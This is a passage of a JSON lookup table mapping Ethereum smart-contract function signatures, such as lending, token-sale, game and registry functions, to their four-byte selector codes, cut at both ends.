"0x0f6a1734", "freezedBalanceOf(address)": "0x1fa5e43b", "test_bytes(bytes,bytes)": "0xf31a044d", "hi()": "0xa99dca3f", "UportRegistry(address)": "0x48ef670e", "bytesToUInt(bytes,bytes32)": "0xae44dea2", "rng()": "0xd605787b", "sendMsg(string,string)": "0xfa3f5acf", "changeCost(uint256)": "0x5cb85cd2", "getPosition(address,bytes32)": "0x0fa8f516", "parseLoanOffering(address[9],uint256[7],uint32[4],bytes)": "0x27b37367", "getTokenProxyAddress()": "0xef339fc4", "transferPosition(bytes32,address)": "0xb652c822", "transferLoan(bytes32,address)": "0x2d7af0f4", "cancelLoanOffering(address[9],uint256[7],uint32[4],uint256)": "0xce13bfb7", "depositCollateral(bytes32,uint256)": "0xdea9b464", "forceRecoverCollateral(bytes32,address)": "0x53f65cf7", "cancelMarginCall(bytes32)": "0xe98ae339", "marginCall(bytes32,uint256)": "0x30bd60ef", "closeWithoutCounterparty(bytes32,uint256,address)": "0x69d565a9", "closePositionDirectly(bytes32,uint256,address)": "0x35371218", "closePosition(bytes32,uint256,address,address,bool,bytes)": "0xf2d7f637", "increaseWithoutCounterparty(bytes32,uint256)": "0x9aa74525", "increasePosition(bytes32,address[7],uint256[8],uint32[2],bool,bytes,bytes)": "0x1445c6da", "openWithoutCounterparty(address[4],uint256[3],uint32[4])": "0x0cb812d3", "openPosition(address[11],uint256[10],uint32[4],bool,bytes,bytes)": "0x0de2b2d8", "getPositioninterestPeriod(bytes32)": "0x5f9209ad", "getPositionMaxDuration(bytes32)": "0x8ccb4daf", "getPositionCallTimeLimit(bytes32)": "0xf0d30786", "getPositionCallTimestamp(bytes32)": "0x56a24be0", "getPositionStartTimestamp(bytes32)": "0x26ad8d1b", "getPositionRequiredDeposit(bytes32)": "0x35ed548f", "getPositionInterestRate(bytes32)": "0x4f77feec", "getPositionPrincipal(bytes32)": "0x0e8a4ac7", "getPositionOwedToken(bytes32)": "0x655c737c", "getPositionHeldToken(bytes32)": "0xc1de9ef8", "getPositionOwner(bytes32)": "0xf172f58f", "getPositionLender(bytes32)": "0x2b4d7c3e", "getPosition(bytes32)": "0x1928b3cb", "getLenderAmountForIncreasePositionAtTime(bytes32,uint256,uint32)": "0xbc6d80fa", "getPositionOwedAmountAtTime(bytes32,uint256,uint32)": "0xa633f61f", "getPositionOwedAmount(bytes32)": "0x94313c5b", "getTimeUntilInterestIncrease(bytes32)": "0x8f368359", "getPositionBalance(bytes32)": "0x54d79868", "getTotalOwedTokenRepaidToLender(bytes32)": "0xbb39c85f", "isPositionClosed(bytes32)": "0x640075f3", "isPositionCalled(bytes32)": "0x6e0cd415", "containsPosition(bytes32)": "0x6d8ab124", "parseTx(address[4],uint256[3],uint32[4])": "0xe1e1f977", "parseLoanOfferRates(uint256[10],uint32[4])": "0x7f86cd3f", "parseLoanOffering(address[11],uint256[10],uint32[4],bytes)": "0xa7324134", "parseOpenTx(address[11],uint256[10],uint32[4],bool,bytes)": "0xf3ac9ee4", "setOperationState(uint8)": "0x539f70d8", "parseLoanOfferRates(uint256[7],uint32[4])": "0xf45dae6e", "parseLoanOffering(address[9],uint256[7],uint32[4])": "0xa685a41e", "cancelMarginCallOnBehalfOfRecurse(address,address,bytes32)": "0xab9c1758", "marginCallOnBehalfOfRecurse(address,address,bytes32,uint256)": "0xfc65ee05", "marginCallOnBehalfOf(address,bytes32,uint256)": "0xabdd0c44", "cancelMarginCallOnBehalfOf(address,bytes32)": "0x83253cfa", "getLoanCanceledAmount(bytes32)": "0x592572e2", "getLoanFilledAmount(bytes32)": "0x439be05c", "getLoanUnavailableAmount(bytes32)": "0x94930138", "increaseLoanOnBehalfOfRecurse(address,address,bytes32,uint256,uint256)": "0xa022da29", "increasePositionOnBehalfOfRecurse(address,address,bytes32,uint256)": "0xdf70ab71", "increasePositionOnBehalfOf(address,bytes32,uint256)": "0xdb4c528b", "increaseLoanOnBehalfOf(address,bytes32,uint256,uint256)": "0x5451fb26", "verifyLoanOfferingRecurse(address,address[9],uint256[7],uint32[4],bytes32,bytes)": "0x9d8b0834", "verifyLoanOffering(address[9],uint256[7],uint32[4],bytes32,bytes)": "0xea51c343", "forceRecoverCollateralOnBehalfOfRecurse(address,address,bytes32,address)": "0x18b3c724", "forceRecoverCollateralOnBehalfOf(address,bytes32,address)": "0x4120bcec", "depositCollateralOnBehalfOfRecurse(address,address,bytes32,uint256)": "0x2581021c", "depositCollateralOnBehalfOf(address,bytes32,uint256)": "0xe6234260", "getExchangeCost(address,address,uint256,bytes)": "0x3a8fdd7d", "exchange(address,address,address,address,uint256,bytes)": "0x7d98ebac", "closeLoanOnBehalfOfRecurse(address,address,address,bytes32,uint256)": "0xeef0fdbe", "closePositionOnBehalfOfRecurse(address,address,address,bytes32,uint256)": "0x6ea69c91", "closeOnBehalfOf(address,address,bytes32,uint256)": "0x35ba1d0a", "closeLoanOnBehalfOf(address,address,bytes32,uint256)": "0x397eb91b", "receiveClosePositionPayout(bytes32,uint256,address,address,address,uint256,uint256,bool)": "0x9432f0c7", "getPositionIdFromNonce(uint256)": "0xe40d835e", "getBlockTimestamp32()": "0x8408643a", "grantPositionOwnership(bytes32,address,address)": "0x2a21566f", "grantLoanOwnership(bytes32,address,address)": "0x5deab0ec", "receivePositionOwnership(address,bytes32)": "0xe25bd409", "receiveLoanOwnership(address,bytes32)": "0x501b0b18", "getCompoundedInterest(uint256,uint256,uint256)": "0x417e8e67", "getNumBits(uint256)": "0xdee8575c", "maxUint32()": "0x12d69389", "maxUint256()": "0xb9330829", "divisionRoundedUp(uint256,uint256)": "0xe2a2adc2", "getPartialAmountRoundedUp(uint256,uint256,uint256)": "0x31bae156", "getPrecomputedEToThe(uint256)": "0x380b5450", "getPrecomputedEToTheHalfToThe(uint256)": "0x22ab9433", "bound(uint256,uint256)": "0xc196b54f", "ClubTeamLockContract()": "0xee47dcec", "validateBalance(address)": "0x823e6e79", "transferFromVault(bytes32,address,address,uint256)": "0x00aa21e6", "transferToVault(bytes32,address,address,uint256)": "0x408275bb", "withdrawExcessToken(address,address)": "0x7995ba90", "available(address,address)": "0xbbe430de", "checkSuccess()": "0x011e6492", "GetStoreInfo()": "0x8f7451ae", "CollectChipBag()": "0xa262c092", "IsOnSale(uint32)": "0x9b10394c", "AddGoods(uint32,uint32,uint256,uint32,uint32,uint32,uint32,uint8,uint8,uint8)": "0xddbfd63e", "setFreezeAddress(address,bool)": "0x9a10f719", "setLockAll(bool)": "0x769c9226", "ALFA()": "0x2d06a1fa", "Cyrus()": "0x474ea7e9", "getsell(uint256)": "0xc510da62", "signReceipt(uint256,int256)": "0xdad2771d", "sendBill(uint256)": "0x0d055d1e", "offerOff(uint256)": "0x0933a670", "offerOn(uint256)": "0x29724d54", "getGood(uint256)": "0x552a6915", "offer(string,string,string,uint256)": "0x3fd29369", "shops()": "0xd6965ff7", "getOne()": "0xab5ed150", "setOne(uint256)": "0x77f25566", "Multiowned(address[],uint256)": "0x95982228", "isManager(address)": "0xf3ae2415", "canAccess()": "0xaa1953cc", "Manageable()": "0x9eeb5a6a", "neg(uint256)": "0x77d2f203", "nSign(uint256)": "0xb054058a", "triCmp(uint256,uint256)": "0x4da25c74", "cmpEq(uint256,uint256,bool)": "0x6c5e9ac1", "cmp(uint256,uint256,bool)": "0xa89f5f85", "addKey(bytes32)": "0x60e6cfd8", "KeyedCollection()": "0x78121b60", "log(bytes32,string)": "0x0be0f677", "message(bytes32,bytes32,string,string)": "0x9dc1d961", "logAccess(bytes32,string)": "0xfd810eb3", "recoverAddress(bytes32,uint8,bytes32,bytes32)": "0x8428cf83", "getKeyData(bytes32,bytes32)": "0x10a101df", "setKeyData(bytes32,bytes32,bytes32)": "0xf6efcb7a", "getKey(bytes32)": "0x12aaac70", "getService(bytes32)": "0xda47d856", "getKeyCount()": "0xee1ce841", "getServiceCount()": "0x3672404e", "setKeyPermissions(bytes32,bool,bool,bool)": "0x5d8d2904", "tradeKey(bytes32,bytes32)": "0x85550c6b", "cancelTradeOffer(bytes32)": "0x2df6e80a", "createTradeOffer(bytes32,bytes32)": "0x1822b886", "purchaseKey(bytes32)": "0xb795dffe", "cancelSalesOffer(bytes32)": "0xa2ee4000", "createSalesOffer(bytes32,address,uint256,bool)": "0x893cebb3", "unshareService(bytes32,address)": "0xc53df937", "unshareKey(bytes32,address)": "0xc74ca049", "shareService(bytes32,address)": "0x81f59f51", "shareKey(bytes32,address)": "0xee29ce15", "issueKey(bytes32,address)": "0x85cc9a2b", "createKey(bytes32)": "0x9cd19074", "createService(string)": "0x52578012", "setLatestContract(address)": "0xf9a8f797", "authorizedToSpend()": "0xc395546c", "getOwnersLength(bytes32)": "0xbfd8fc93", "updateUrl(bytes32,string)": "0x2d599750", "getUrlFromKey(bytes32)": "0x2239e688", "getUrl(bytes32)": "0x334f22c7", "isServiceOwner(bytes32,address)": "0x536d888b", "isKeyOwner(bytes32,address)": "0x33c9ccf5", "queryTokensOf(address)": "0x583d5435", "queryTokens()": "0x160a453e", "sendPTokenFrom(address,uint256,address)": "0xaa3eb769", "sendPToken(address,uint256)": "0xc312d468", "mine(address)": "0x81923240", "propertyToken()": "0x43ae2695", "getLatestUpdate()": "0xadb4af3e", "getUpdateByID(uint256)": "0x047d6649", "newUpdate(string,bool)": "0xfc190d6e", "getTotalUpdates()": "0x9c9c344c", "checkForUpdaterUpdate()": "0x45a727de", "updateUpdater(address,string)": "0x5f4a47c3", "newWeiController(address,address,uint256,bool)": "0xea9fa768", "WeiControllerFactory(address)": "0xa3035454", "CashPokerProToken()": "0x3cfd86f1", "play(uint256[3])": "0x5478dbb7", "setResults(uint256[4])": "0x4cba5c6a", "getGameResults()": "0x89e28a47", "BacCara()": "0xf17b1d63", "hello1()": "0xdf022cbc", "createEvent(string)": "0x9bc2bc71", "xtestTransferToken()": "0xd5bab53d", "testBaseStoreTokenUsingDeployedContract()": "0xf79fc70d", "requestRefund(bytes32)": "0x775274a1", "hasDeadlinePassed(bytes32)": "0x84d80057", "solveChallenge(bytes32)": "0x6b236730", "registerChallenge(bytes32,uint256)": "0x261c085e", "AutoFare(uint16,uint16)": "0x290e1c20", "offerBonus(uint256)": "0x534eb1d4", "mint(int256,address,uint256,bool,uint32)": "0xedb08434", "claimBonus(address)": "0x0e99f5e6", "lastMintedTimestamp(address)": "0x7ba49b81", "isSealed()": "0x631f9852", "VEN()": "0xbc356eea", "getTransferRawAddress(bytes)": "0xc97cc71e", "removeChild(bytes32,bytes32)": "0x8f81ecfc", "addChild(bytes32,bytes32)": "0xe87da468", "setMember(bytes32,address,bool)": "0x7d487532", "create(bytes32,address,bytes32[])": "0x98876609", "members(bytes32,address)": "0x7e1cb559", "children(bytes32)": "0x4ce11c52", "FabCoin()": "0x2763d8fb", "ERC20(uint256,string,uint8,string)": "0x9f2c1fd8", "concludeCampaign(uint256)": "0x071357bd", "donateToCampaign(uint256,uint256)": "0x2b7216e5", "countCampaigns(address)": "0x498f27ae", "addCollaborateToCampaign(uint256,uint256)": "0xb4c555a7", "removeSale(bytes32)": "0x8d182f01", "createSale(bytes32,uint256)": "0xbf735b13", "addCard(bytes32,address,uint256,uint256,uint256,uint256)": "0xb6ca878c", "withdrawContractBalance()": "0xbfab3db9", "payShareholders(uint256)": "0x6eb2f0cc", "addShareholderAddress(address)": "0x467aeec9", "getArtist(bytes32)": "0xb989ffa7", "computeArtistGenesisSaleFee(bytes32,uint256)": "0x82c9004a", "computeArtistTxFee(bytes32,uint256)": "0x21819e5c", "addArtistToRegistry(bytes32,address,uint256,uint256)": "0xc68cee04", "registryTransfer(address,address,bytes32,uint256)": "0x59727e83", "getNumSigs(bytes32)": "0xc69b3936", "getNumSigsOwned(bytes32)": "0x50a8d2b9", "getAllSigs()": "0xbb1630f2", "addCardToRegistry(address,bytes32,uint256)": "0xbebf8498", "cancelSale(address,bytes32)": "0x181fd85b", "postSale(address,bytes32,uint256)": "0x4d620299", "relistGenesisSales(bytes32,uint256)": "0xc29402f1", "postGenesisSales(bytes32,uint256,uint256)": "0x4bdfa061", "getMySalePrice(bytes32)": "0xfc6c403b", "getBestSale(bytes32)": "0xc41efe08", "asyncDebit(address,uint256)": "0xf1b3ea6f", "GeneratedERC20Contract()": "0x760cfa57", "CTCoin()": "0x46325b48", "DappToken(uint256)": "0xd9901ce4", "CocoToken()": "0x145b2ab2", "MDXToken()": "0xba057826", "_reinvest(bytes32,uint256)": "0xb020d7a3", "_joinCDP(bytes32,uint256)": "0x9d75c113", "_openAndJoinCDPWETH(uint256)": "0x5da6e035", "setMinDai(uint256)": "0x629e89a0", "setMinETH(uint256)": "0x4e7073f1", "setLiqPrice(uint256)": "0x0a9626ba", "setSlippage(uint256)": "0xf0fa55a9", "giveMeETH()": "0x2a66ede5", "giveMeCDP(uint256)": "0xf82a7496", "shutForDai(uint256)": "0x127f2d2c", "shutForETH(uint256)": "0x03d3a6b7", "createCDPLeveragedDai(uint256)": "0x6092e55b", "createCDPLeveragedAllDai()": "0xd9bdd6fa", "createCDPLeveraged()": "0xdfe71183", "createAndJoinCDPDai(uint256)": "0x8b4d56de", "createAndJoinCDPAllDai()": "0x5e1a01c3", "createAndJoinCDP()": "0xdcff2f76", "tubParamUpdate()": "0xa42533c8", "CDPer()": "0x09e1c751", "bite(bytes32)": "0x40cc8854", "shut(bytes32)": "0xb84d2106", "wipe(bytes32,uint256)": "0x73b38101", "free(bytes32,uint256)": "0xa5cd184e", "safe(bytes32)": "0xe95823ad", "exit(uint256)": "0x7f8661a1", "join(uint256)": "0x049878f3", "per()": "0x7ec9c3b8", "rap(bytes32)": "0x6f78ee0d", "tab(bytes32)": "0xf7c8d634", "ink(bytes32)": "0x1f3634ed", "cups(bytes32)": "0xfdac0025", "mat()": "0xab0783da", "DSProxy(address)": "0x49cf5f1b", "DSToken(string)": "0x71e3c819", "S(string)": "0x8f38d8cc", "displayNick(address)": "0x8e497470", "setNick(string)": "0x20e98bf4", "displayCard(uint256)": "0xbf5124d0", "addCard(string,uint256,int256,string,uint256,uint256,address)": "0x8abdb005", "CryptoNumismat()": "0x7c7959e0", "MartinKoToken()": "0x23ecf108", "tokensToWei(uint256)": "0x7346ec57", "WWAMPricingStrategy(uint256,uint256,uint256)": "0x0fd3d758", "doPurchase(address,uint256)": "0x17968fc9", "extend(uint256)": "0x9714378c", "start(uint256,uint256,uint256,uint256)": "0x707a4e96", "EtalonTokenPresale(address,address)": "0x39ac3300", "EtalonToken()": "0xcd85e945", "ZITRON()": "0x1d5aca61", "StarSportsToken()": "0x8f003a2d", "getLockedFundsLastSpending()": "0xd7b15a88", "getVesting()": "0xbcc4e4ab", "TeamVesting(address)": "0x94d3de83", "canPerform(address,address,bytes32)": "0x1a2b6250", "getCode()": "0xea879634", "isUpgradeable()": "0xdaa3a163", "getFunds(uint256)": "0x3e721015", "setBenefit(address)": "0x93f63e70", "Presale(address,address,address,address)": "0x02a6f266", "Admins(address,address,address)": "0x4903c401", "transferPresale(address,uint256)": "0xc63755e1", "presaleAddr()": "0xee620965", "ZRXToken()": "0x7b5005e8", "numberOfMoods()": "0x475289da", "addMood(string)": "0x26ab378b", "changeMood(string)": "0x55207a07", "EmtCrowdfund(uint256,uint256,string,string)": "0xb2019b8a", "changeStatement(string)": "0x19113b4a", "withdrawEthFromBalance()": "0x776247c4", "setParties(address,address,address,address,address)": "0x08ba7ee7", "purchasesCount()": "0x50904081", "isAvailable(uint32)": "0x31e5144c", "addCutie(uint32,uint128,uint128,uint128,uint128)": "0x3c7e31f0", "airdropper()": "0xc9d68389", "EMPTY_PARAM_HASH()": "0xc513f66e", "_softcap()": "0xe5665b57", "nextDrawTime()": "0x74f47a7a", "FIRST_TIER_DISCOUNT()": "0xe3d7f159", "Tokens_For_Sale()": "0x168110f3", "amountRaisedICO()": "0x344eca75", "unlocker()": "0x00076943", "icoTotalAmount()": "0x21b133ed", "campaignUrl()": "0xfa4f5511", "BOUNTY_SHARE()": "0xbe4ebda3", "floaksAddress()": "0x3339f96d", "actionAuthorisedBy()": "0x004b1e75", "tokensSoldTotal()": "0x4dcad927", "profitSharingContract()": "0xaf3f12bc", "accountC()": "0x844669b3", "weiPerAnimal()": "0x5fb80f20", "forthWeekMainICOBonusEstimate()": "0xc7891514", "vendorAllocation()": "0x85fdeba7", "totalFunded()": "0xad044f49", "end_ICOs()": "0x5c13e2b5", "bntConverter()": "0x011857d0", "disallowOwner()": "0x3a4b5e6d", "allocationPool()": "0x9b9073e4", "relief()": "0xd02042a3", "PRIVATE_SALE_LIMIT()": "0xc306834e", "transferFeeNumerator()": "0x8f98ce8f", "holdingTaxInterval()": "0xb686d8b4", "nextRoundId()": "0x4002eda6", "lastPrice()": "0x053f14da", "totalLBSold_CORNERSTONE()": "0xa68e4578", "gameShouldRestart()": "0x7bfa6e1a", "grantsController()": "0x8e4c64c0", "gameValue()": "0xdab4cb87", "presaleFinishTime()": "0x72d0774a", "marketKebabs()": "0x219862d0", "developersKey()": "0x96c266ca", "Bro()": "0xb9d0a638", "loan()": "0xd285b7b4", "RANGEEND_7()": "0x6dc55f7e", "centralAdmin()": "0x21c0183e", "minInvestCents()": "0xca13fb0f", "BONUS_DAY1_DURATION()": "0xa786c1d2", "initialQuorumPercent()": "0x6eb6ffa7", "totalTokensMinted()": "0x7d549e99", "charityAddress()": "0xafcf2fc4", "firstLockTime()": "0x19bf01c0", "dubi()": "0x54829cad", "charity()": "0x934aa023", "PRICE_MULTIPLIER_ICO1()": "0xf50b5308", "bounty_funds()": "0x075840d0", "SendPreReserved3()": "0x97ee0a05", "deathData_v13()": "0x27eb95cf", "getVerificationLevel()": "0x122b0e85", "repossessionBountyPerHundred()": "0x4c9f45eb", "regulator()": "0xdd8fee14", "whaleIncreaseLimit()": "0xf40a9112", "maxTokenCount()": "0xc4e627c2", "endRelease()": "0x51d962e1", "decay()": "0x54fac919", "LIABILITIES()": "0x09b481b0", "bettingEnd()": "0x70b2fb05", "calculatePoints()": "0x3f6a2c97", "marketPoohs()": "0xb5f45edf", "NULL_ENCRYPTION_ALGORITHM_DESCRIPTION_URI_SET_ID()": "0xfab3ebb1", "remainPantry()": "0x45190584", "dteamVaultAddr4()": "0x56447520", "exporterBanker()": "0x10c4610b", "btnSupply()": "0xfd0dd4d0", "minContributionInUsdCents()": "0x588ec17f", "preSaleHalted()": "0x0ef504ae", "secondWeekPreICOBonusEstimate()": "0x527942ac", "bonusEnd05()": "0xba16e00e", "rateWin()": "0x480b1f21", "product4()": "0xeb18ebdf", "cap_in_wei()": "0x98358f82", "atFundDeposit()": "0x208e8914", "preferredSaleTokensLeftForSale()": "0xc2dcdfb4", "burnToAddr()": "0xa18c1ab0", "mask()": "0x116134ee", "totalPreICOAmount()": "0x5c4a627f", "isReachedGoal()": "0x52a2695c", "changingEnabled()": "0x73e61cf2", "finalFundGoalReached()": "0x82b00403", "etherPriceUSD()": "0x9f0650d9", "addressPartnerships()": "0x2be29d71", "getNID()": "0xd8c4661c", "getBylawsMinTimeInTheFutureForMeetingCreation()": "0x7d6dc737", "onSaleTokens()": "0xdf90061b", "teamTokensNotDistributed()": "0xc54421ae", "seedInvestorsReserve()": "0xae5409fb", "eventcount()": "0x52125b86", "icoOver5()": "0x6889cf86", "advisorsTokensWallet()": "0xe5f3b2dc", "BROKER_RESERVE_ADDRESS()": "0x1d1ca65b", "PUBLICSALE_USD_PER_MSENC()": "0x43c29522", "lastOracleUpdate()": "0xb609d0e6", "timeLimitEnable()": "0xfe58d3a3", "breedingDB()": "0x134a04ea", "presaleTokensSold()": "0x341c3304", "MicroToken()": "0xe7d8c7db", "voirMessage()": "0xaa87af1e", "definirMessage(string)": "0xa244e03d", "setLastAlert(string,int256,string)": "0xee92d2b5", "getLastAlert(string,int256)": "0x07ea65c8", "get_my_dni()": "0xb112349e", "set_dni(uint256)": "0xc59671a7", "killTokenContract()": "0x0018b665", "CodeFundToken()": "0x08252f03", "AmazingDex(address)": "0x3e3bc743", "interRefreshLock()": "0xf06b0901", "specialUsers()": "0x6f6bdbe3", "useBalanceOf(address)": "0x69132d43", "distributeSpecial(address,uint256)": "0x1607dd9d", "setRefreshLockBalance(address)": "0xbaae172c", "setInterRefreshLock(bool)": "0x1c435872", "lockUserInfo(address)": "0xac1a7175", "lockBalance(address)": "0x7441b8bb", "setLockBalance(address)": "0x58056392", "validTransfer(address,address,uint256,bool)": "0x8a30442e", "lockState(address)": "0x94dbc70e", "bytarr(bytes32[])": "0x9462f4bc", "InDeepToken()": "0x3c7a337a", "KhairulRamadhan()": "0x98f4f54f", "OnChainOrderBookV013bFactory()": "0x5545f12b", "OnChainOrderBookV013b()": "0x9c7c2498", "issuingRecordAdd(uint256,bytes32,uint256,uint256,uint256,string,uint256)": "0x498a690f", "sendTokenToPlatform(uint256)": "0x94e09511", "modifyPlatformAddr(address)": "0xbc30f3f8", "nccToken()": "0x15e3ab3a", "EUNOMIA()": "0x51027320", "weiToTokensBono(uint256)": "0xf2fc6deb", "CosmoCoin()": "0x0229ae31", "getCET6InfoById(uint32)": "0x298994c6", "getCET4InfoById(uint32)": "0xd4897729", "getCET6ScoreById(uint32)": "0xbb862588", "getCET4ScoreById(uint32)": "0xa8abe1fb", "addCET6(uint32,uint64,uint64,uint64,uint16,uint16,uint8,uint8,uint8)": "0x61751577", "addCET4(uint32,uint64,uint64,uint64,uint16,uint16,uint8,uint8,uint8)": "0xd35bcf88", "dkBB(bytes32)": "0x791af2b6", "dkSB(string)": "0x5962ad30", "testRewardBS(bytes32)": "0xc7f46dea", "testRewardBB(bytes32)": "0xe17bf87a", "testRewardSB(string)": "0x183abe66", "testRewardSS(string)": "0xb56e2d76", "b2s(bytes32)": "0x7085b579", "b2sother(bytes32,bytes32)": "0x636f12fe", "updateAsset(uint256,string,string,string,uint256,address)": "0x372c66e3", "createAsset(string,string,string,uint256,address)": "0x928c82a2", "EEFucksToken()": "0x6ac777d3", "determineFinalOutcome(uint256)": "0xcd55cda2", "determineOutcome(uint256)": "0xf727550e", "determineFirstPeriodOutcome(uint256)": "0xe41c02c9", "getResult(uint256,uint256,uint256,uint256,uint256)": "0x7ed51b47", "getVotingPower(uint256,uint256,address)": "0x3f3a4966", "getFinalOutcomeByEntity(uint256)": "0x162e4fd0", "getOutcomeOfSecondPeriodByEntity(uint256)": "0x44947b9d", "getOutcomeOfFirstPeriodByEntity(uint256)": "0x8be18df9", "getCurrentPeriodByEntity(uint256)": "0x3635e329", "getNOVotesByEntity(uint256)": "0x0021d364", "getYESVotesByEntity(uint256)": "0x6a83662e", "castVote(uint256,uint256,uint256)": "0x5be5e3ec", "addEntity(string,uint256,uint256)": "0x8f924560", "_transferToAnotherAddr(address,uint256,bytes32)": "0x94de3825", "_withdrawWonCosFromGame(uint256,uint256,uint256)": "0x362a0c27", "_withdrawAffVault(uint256)": "0xcc75ac19", "_withdrawHoldVault(uint256)": "0x4baffdc6", "_iWantXKeys(uint256)": "0x29e80a80", "_buyLeader(uint256,uint256)": "0x1df6d86e", "_buyProp(uint256,uint256,uint256)": "0xb9d677f9", "_playGame(uint256,uint256,uint256,bytes32)": "0x987f3bdb", "_sellKeys(uint256,uint256,bytes32)": "0xe9347e31", "_getPlayerInfoByAddress(address)": "0xe4e075cc", "_buyXaddr(address,uint256,bytes32)": "0x576e6d4e", "_buyXid(uint256,uint256,bytes32)": "0xd38185d3", "PredatexTiga()": "0x56af3f2b", "XXX()": "0xfc8f616e", "FaucetToken()": "0x3b84333e", "IncubatorGlobalGas()": "0xca25bf6f", "OrangeToken()": "0x55bf3dbb", "makeSchoolToken()": "0xce8ebfc8", "Cartycoin(uint256,string,string)": "0x55c4c5b3", "NewHashnodeTestCoin()": "0x21f9a878", "joinGameTeam(bytes32,uint8)": "0xae200c73", "joinGameReferred(bytes32,address,uint8)": "0x2e519ad5", "initGameTeam(uint8)": "0xaab52c33", "initGameReferred(address,uint8)": "0xdb1227da", "setPercentages(uint256,uint256,uint256,uint256,uint256)": "0x83e06ead", "withdrawAffiliateBalance(address)": "0xbf56ac81", "withdrawHighscorePot(address)": "0x80a738bf", "permaStop()": "0x8e1876ee", "burn(uint256,string,uint256)": "0x62e2aa00", "setColdLedger(address)": "0x481ae5d0", "releaseTimeLock()": "0xdbee0dea", "setTimeLock(uint256,uint256)": "0x3143d97c", "Fuck()": "0x96c12acb", "avalibleSTCTokens()": "0xa5135634", "batchTransfer(address[])": "0xd3c1c838", "getERC20TokenBalance(address,address)": "0x036896ab", "BABI()": "0x2cc6cf4a", "updateMIN_CONTRIBUTION(uint256)": "0x6531041b", "multiSend(address[],uint256[],address[])": "0x1411539d", "sendTo(address,uint256,address)": "0xdfafaa72", "checkBool(bool[])": "0xd2eda057", "addToken(address,address,string)": "0xac59f0d9", "getBalanceInRemix(address)": "0xae2b4e16", "capture()": "0xd4a3e9d7", "depositToGateway(uint256)": "0x9267daba", "transferFromStudio(address,address,uint256)": "0xa2c6fa83", "buyStudioStake(address,uint256)": "0x5415f3a7", "setStarContract(address)": "0xf186d77e", "_addPauser(address)": "0xca2f5cb4", "_addMinter(address)": "0x03c7bce1", "finalizeFundAddress(address)": "0x67d326ef", "updateFundAddress(address)": "0x1d5459f7", "FrellyToken()": "0x5351ad81", "MyGameToken()": "0x97911fd7", "AceguyToken()": "0x1b23cfd2", "_lastSnapshotId(address)": "0x7640304d", "_updateSnapshot(address)": "0x28450159", "smileyToken()": "0xac51d3a5", "VitaminTokenNew(uint256,string,string)": "0xb7161cc1", "sendVal()": "0xc4b6fec9", "MicroBitcoinToken()": "0x1d2aabcb", "withdrawJajalanTokens(address)": "0xb481cbc0", "JJL()": "0xc2d5baf9", "ALH3()": "0xdf9b5fe9", "getFileByIndex(uint256)": "0x097694e1", "addFile(bytes32,bytes32)": "0x4f256693", "FinalToken(uint256)": "0xe795c149", "Token0901(uint256,string,string)": "0xe332dfe9", "getPara(uint256,uint256)": "0xb3c9983a", "CrowdTmoney()": "0x200138b9", "AirDropAFTK3SeptSandBox()": "0xab23c50d", "NepExToken()": "0x068aafb8", "addDeal(uint256,string,string,uint256,bytes32,string)": "0xd92ec71b", "recoverLeftovers()": "0xefba9bd2", "setEventResult(string)": "0xa376c19d", "setDataFeedHash(string)": "0x437933cc", "markRewardsSet()": "0x2cc689f9", "setRewards(address[],uint256[],uint256[])": "0x1a0ddce9", "isParticipating(address)": "0xf4caee88", "joinEvent()": "0xf9010d19", "BleedFomo()": "0x24c30182", "getBigWinPot()": "0x06a74947", "StarlightToken()": "0xe34e1700", "getTokenReleasePercentage()": "0x503687bc", "setCastleLootDistributionThreshold(uint256)": "0x92066346", "getPurchaseRequirements(uint8)": "0x721e117b", "setPurchaseRequirements(uint8,address[],uint256[])": "0xc1333a9c", "StaxToken()": "0x2c4a84f7", "ICOWIZARD(string,string,uint8,uint256)": "0xf3a53cd8", "setTokenOptions(bool,bool,bool)": "0x1e83e697", "Galaxy100()": "0x1916fcb7", "initialiseValues()": "0xdf8b7771", "flushShareNext()": "0xfd3c1391", "Bitprize()": "0x6f53a48a", "EXPC()": "0x189959de", "RenmiCoin()": "0x0f74e527", "Arte()": "0xaf07c768", "GetChallengeCreator(uint256)": "0x3edbd76e", "ERC20Standard(uint256,string,uint256,string,bool)": "0xc5210e89", "StreampayToken()": "0x8f10cad0", "transferTokens(bytes32,address,uint256)": "0x1f9988c9", "removeToken(bytes32)": "0x224e7462", "addNewToken(bytes32,address,address)": "0x6f10d1a0", "newGame(uint8,string,string,bytes32,uint256)": "0x0c3f08c6", "WoodyToken()": "0x856c486b", "IsaDalawa()": "0x1ca19ece", "getWhiteUsers()": "0x259bc6f5", "addManyUsers(address[],uint256[])": "0xecf1e0fd", "sendEthBackToUsers()": "0xdbe1053d", "transferBlocToUsers()": "0x75a949a3", "changeBlocPerEth(uint256)": "0x59aaaf86", "withdrawBloc(uint256)": "0x8eb6ffaa", "changeRebackRate(uint256)": "0x9d09f8e5", "changePerEthToBlocNumber(uint256)": "0x7185354b", "getRebackRate()": "0x2145a455", "YDHTOKEN_M(string,string,uint256)": "0x70858679", "_mint(address,uint256,string)": "0xa987d4c6", "STOREDIG()": "0x72d32586", "computeScore(address)": "0xc5d46dfc", "isPlayer(address,address)": "0x2c1eed5f", "getInteractionPrice(address)": "0x33260fe7", "getCurrentRgb(address)": "0xa09ddf4e", "getDefaultRgb(address)": "0x4df65873", "blendWithYourself()": "0x074e6254", "blendWithOthers(address,uint256,uint256,uint256)": "0xd829f1e0", "setInteractionPrice(uint256)": "0xa3face0b", "DBDHToken()": "0x00b9840a", "MARKTY()": "0x38ca683b", "withdrawNetIncome()": "0xd095761f", "feeProcess()": "0x540f3d6d", "getCumulativeIncome()": "0x9ae6ef15", "ETHPonzi()": "0x5b2e1eb1", "TestTokenContract()": "0x2afe9f1e", "AddGameCategory(string)": "0xcaee04b5", "RegisterChallengeCreators(address,string)": "0x9e6bdea0", "AddNewChallenge(uint256,uint256,uint256,uint256,uint256,bool,string)": "0x67bfc445", "isValidInvestment(address,uint256)": "0xc74c851a", "MRNToEth()": "0x8aece8b0", "lockBegunAtBlock()": "0x0de41e45", "makeTokensTransferable()": "0x5348ac95", "waveCap2()": "0x01b96aaf", "TransferAllowed()": "0x795b0e16", "privateSaleList()": "0x5c28c7e0", "OwnedResolver()": "0x387b6c2f", "for_votes()": "0xb8fa7778", "toFound()": "0x467730fb", "AgriChainContext()": "0x208b7427", "marketingTokensDistributed()": "0xa17177a1", "peMinPerPerson()": "0xb88064ad", "TEAM_POOL_ADDR()": "0x4ab5439b", "blockWithdrawBegin()": "0xacdf67b3", "turnOffCanUpdateNextGameInitalMinBetSize()": "0xf63f0e62", "addressDataProviders()": "0x29b9f367", "tdeIssuer()": "0x2b37d313", 